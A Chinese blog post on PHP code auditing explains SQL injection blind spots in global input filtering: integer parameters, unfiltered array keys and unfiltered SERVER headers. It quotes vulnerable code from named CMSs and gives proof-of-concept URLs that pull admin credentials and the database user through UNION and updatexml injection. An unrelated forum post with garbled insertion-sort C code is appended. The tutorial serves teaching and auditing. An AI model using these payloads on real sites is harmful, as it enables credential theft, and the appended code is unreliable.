【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结上篇

版权声明:本文由Bypass原创发布,转载请保留出处。欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。 https://blog.csdn.net/qq_23936389/article/details/86177056

【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护盲点的总结上篇

0x01 背景

现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启,然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的,比如最经典的整型参数传递,也即被带入数据库查询的参数是整型、数组中的key没过滤被带入了查询以及全局过滤了GET、POST但没过滤SERVER或COOKIE引发的注入。所以看似有全局防护,实则隐藏了很多“后门”~
盲点如下:
①注入点类似id=1这种整型的参数就会完全无视GPC的过滤;
②注入点包含键值对的,那么这里只检测了value,对key的过滤就没有防护;
③有时候全局的过滤只过滤掉GET、POST和COOKIE,但是没过滤SERVER。
附常见的SERVER变量(具体含义自行百度):QUERY_STRING,X_FORWARDED_FOR,CLIENT_IP,HTTP_HOST,ACCEPT_LANGUAGE

0x02 环境搭建

环境请自行搜寻和搭建吧,从这篇开始只做分析不提供漏洞测试环境~~

0x03 漏洞分析

完全无视GPC的数字型的注入,其实仔细总结下发现还是很多可以学习的地方。

1.传入的参数未做intval转换、构造的sql语句没有单引号保护

这个还是比较常见的,当初笔者挖到过一些,乌云案例http://www.wooyun.org/bugs/wooyun-2010-065605

<?php
require_once "admin/common.php";
require_once(MOBAN_PATH_QZ."header.html");
//这里typeid没有做整形转换
$typeid=isset($_GET['typeid']) ? $_GET['typeid'] : 1;
//sql语句没有单引号保护
$type=$db->fetch_array(mysql_query($sql="select * from ".$db->tablepre."newstype where newstypeid=".$typeid));//typeid参数存在注入,数字型;
?>

 

获取管理员账户密码的POC:

http://localhost/jdy1.5/typeid.php?typeid=1 and 1=2 UNION SELECT NULL,(select concat(username,0x23,password) from jdy_admin limit 1),NULL, 

2.同一参数在第一个sql里做了单引号保护,紧跟第二个忘记加单引号

有幸在Discuz!上看到此类问题,膜拜下雨牛的漏洞http://www.wooyun.org/bugs/wooyun-2014-079045
简单分析下漏洞原理
首先$itemid经过的第一条SQL语句如下

$query = $_SGLOBAL['db']->query('SELECT * FROM '.tname('spacetags').' WHERE itemid=\''.$itemid.'\' AND status=\''.$status.'\'') 

$itemid是有单引号保护的并且做了select查询,如果查询有结果才会带入到delete中,如果无结果就不执行delete。在数据库里itemid是int类型存储的,所以这里本意是只能提交数字型才能查询出结果,如果不是提交的数字的话那么就查询不出来结果,就不去执行下面的delete语句了。但是由于mysql的类型转换,因为这里储存的是int类型,所以1xxxxx跟1的查询结果是一样的,如下:

然后后面第二条delete的sql语句如下

$_SGLOBAL['db']->query('DELETE FROM '.tname('spacetags').' WHERE itemid='.$itemid.' AND tagid IN ('.simplode($deletetagidarr).') AND status=\''.$status.'\''); 

这里忘记加单引号了,根据上图我们可以构造获取数据库用户的POC:

http://localhost/sup/dan/supesite/cp.php?ac=news&op=view&itemid=4 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))# 

3.php弱类型语言,判断逻辑错误引发注入

还是雨牛的案例http://www.wooyun.org/bugs/wooyun-2010-088872
这里只讲下漏洞形成的原理

如上图,弱类型语言在逻辑判断上0<1和0 union select 1<1是等价的,都返回True。

数组类型,全局防护只过滤了value,key未过滤带入了查询

程序员往往在对数组的处理上不够严谨,导致会出现此类漏洞,笔者当年有幸挖到过ShopEx旗下的ecmall存在这类漏洞,链接:http://www.wooyun.org/bugs/wooyun-2010-065284
由于上面那个案例跟序列化相关且过程较为复杂,这里引用乌云另外一则案例:http://www.wooyun.org/bugs/wooyun-2010-069746,简要分析这个案例,我们首先看下对数组进行处理的函数:

$_POST=Add_S($_POST);
$_GET=Add_S($_GET);
$_COOKIE=Add_S($_COOKIE);
... ...
function Add_S($array){
foreach($array as $key=>$value){
if(!is_array($value)){
$value=str_replace("&#x","& # x",$value); //过滤一些不安全字符
$value=preg_replace("/eval/i","eva l",$value); //过滤不安全函数
!get_magic_quotes_gpc() && $value=addslashes($value);
$array[$key]=$value;
}else{
$array[$key]=Add_S($array[$key]);
}
}
return $array;

 

可以看到对数组的value进行了严格的过滤和addlashes转义,但对key没有任何过滤操作,然后我们全局搜索关键词“$key=>$value”,发现如下代码$key被带入了查询

elseif($job=='manage')
{
if(!$atc_power)showerr("你没权限");
if($rsdb[pages]<2){
header("location:post.php?job=edit&aid=$aid&mid=$mid&only=$only");exit;
}
$erp=get_id_table($aid);
if($step==2){
asort($orderDB);
$i=0;
foreach( $orderDB AS $key=>$value){
$i++;
$db->query("UPDATE {$pre}reply$erp SET orderid=$i WHERE aid='$aid' AND rid='$key'");
}

 

构造获取管理员账户密码的POC如下图:

其它案例:http://www.wooyun.org/bugs/wooyun-2014-071516

SERVER变量未过滤

常常发生在获取用户ip并入库的函数上,类似如下代码:

//获取访问者IP(PHP代码/函数)	
function get_ip(){
if(getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"),"unknown")){
$ip=getenv("HTTP_CLIENT_IP");
}else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"),"unknown")){
$ip=getenv("HTTP_X_FORWARDED_FOR");
}else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"),"unknown")){
$ip=getenv("REMOTE_ADDR");
}else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],"unknown")){
$ip=$_SERVER['REMOTE_ADDR'];
}else{
$ip="unknown" ;
}
return $ip;
}

 

发现通过$_SERVER变量获取客户端ip且可以通过X_FORWARDED_FOR伪造,然后这里对X_FORWARDED_FOR是没有任何正则处理的,所以我们全局搜索下get_ip函数发现有一些调用并且入库的地方。
program/index/receive/login.php处代码为例:

//这里使用get_ip函数获取客户ip
$ip=get_ip();
//这里入库,所以可以注入了
$sql="update ".$pdo->index_pre."user set `last_time`='$time',`last_ip`='$ip' where `id`='".$_SESSION['monxin']['id']."'";
$pdo->exec($sql);
$sql="select count(id) as c from ".$pdo->index_pre."user_login where `userid`='".$_SESSION['monxin']['id']."'";
$stmt=$pdo->query($sql,2);
$v=$stmt->fetch(2);
if($v['c']<self::$config['other']['user_login_log']){
$sql="insert into ".$pdo->index_pre."user_login (`userid`,`ip`,`time`,`position`) values ('".$_SESSION['monxin']['id']."','$ip','$time','".get_ip_position($ip)."')";
}else{
$sql="select `id` from ".$pdo->index_pre."user_login where `userid`='".$_SESSION['monxin']['id']."' order by time asc limit 0,1";
$stmt=$pdo->query($sql,2);
$v=$stmt->fetch(2);
$sql="update ".$pdo->index_pre."user_login set `ip`='$ip',`time`='$time' where `id`='".$v['id']."'";
}
$pdo->exec($sql);

 

案例:http://www.wooyun.org/bugs/wooyun-2010-0173485

本文由HackBraid整理总结,原文链接:http://www.cnbraid.com/2016/04/29/sql5/,如需转载请联系作者。

posted @ 2016-05-28 21:44 Bypass 阅读(...) 评论(...) 编辑 收藏

那些年,我们一起玩过的排序之插入排序!

08-20

[color=#FF0000]插入排序:[/color]rn基本思想:rn每次将一个待排序的记录,按其关键字的大小插入到前面已经排好序的有序序列中的适当位置上,直到全部记录插入完成为止。rn[color=#FF0000]1:直接插入排序[/color]rn依次将记录序列中的每一个记录插入到有序序列中,使有序序列的长度不断地扩大。rnrn直接插入法算法简单,容易实现,其算法的时间复杂度是O(n平方)。rn[code=C/C++]rn#includernmain()rn int i,j;rn int r[9] = 0,42,36,56,78,67,11,27,36;/*定义数组并赋初值,其中r[0]为监视韶,初值为0*/rn for(i = 2;i<=8;++i)rn if(r[i]rnmain()rn int i,j,low,high,m;rn int r[0]= 0,42,36,56,78,67,11,27,36;rn for(i = 2;i<=8;++i)rn r[0] = r[i];/*将r[i]暂存到r[0]中*/rn low =1;rn high = i - 1;rn while(low<=high)//在r[0] 和r[i] 中折半查找插入位置rn m = (low+high)/2;rn if(r[0]=high+1;--j)rn r[j+1] = r[j];//插入位置以后的记录后移rn r[high+1] = r[0];//插入记录rn rnrn for(i=1;i<=8;i++)rn printf("%d ",r[i]);rn rn rnrnrn[/code]rnrn[color=#FF0000]3 二路插入排序[/color]rn是对折半插入排序的改进算法,它是利用增加辅助空间来减少排序过程中移动的次数。rnrn具体做法:rn建立一个和待排序序列r[n]同类型的数组d[n]作为辅助空间,首先将r[0]的值赋值给d[0],将d[0]看成是处于最后有序序列中处于中间位置的记录,然后从r[1]开始依次将记录插入到d[0]之前或之后的有序序列中。rnrn[code=C/C++]rn#includernmain()rn int i,j,first,final;rn int r[8] = 42,36,56,78,67,11,27,36;/*定义并初始化*/rn int d[8];rn d[0] = r[0];rn first =final = 0;rn for(i=1;i<8;i++)rn if(r[i]>=r[0])/*r[i]插入到r[0]之后的序列*/rn for(j= final;r[i]d[j]&&j<8;j++)rn d[j-1] = d[j];//向前移动元素rn d[j-1] = r[i];rn first --;rn rn rn rn rn if(first < final)//若first所指的位置在final之前 则依次输出rn for(i=first;i<8;i++)rn printf("%d ",d[i]);rn elsern for(i=first;i<8;i++)//输出前半序列rn printf("%d ",d[i]);rn rn for(i=0;irnmain()rn int r[10] = 45,38,63,85,71,17,28,45,6,90;rn int d,i,j,k,x;rn d = 10/2;//取第一个步长值rn while(d>=1)rn for(i=d;i<10;i++)//对各组进行直接插入排序rn x = r[i];//记录r[i]暂存x中rn j = i-d;//确定每组中的记录r[i]前一个位置rn while(j>=0 && x

没有更多推荐了,返回首页

私密
私密原因:
请选择设置私密原因
  • 广告
  • 抄袭
  • 版权
  • 政治
  • 色情
  • 无意义
  • 其他
其他原因:
120
出错啦
系统繁忙,请稍后再试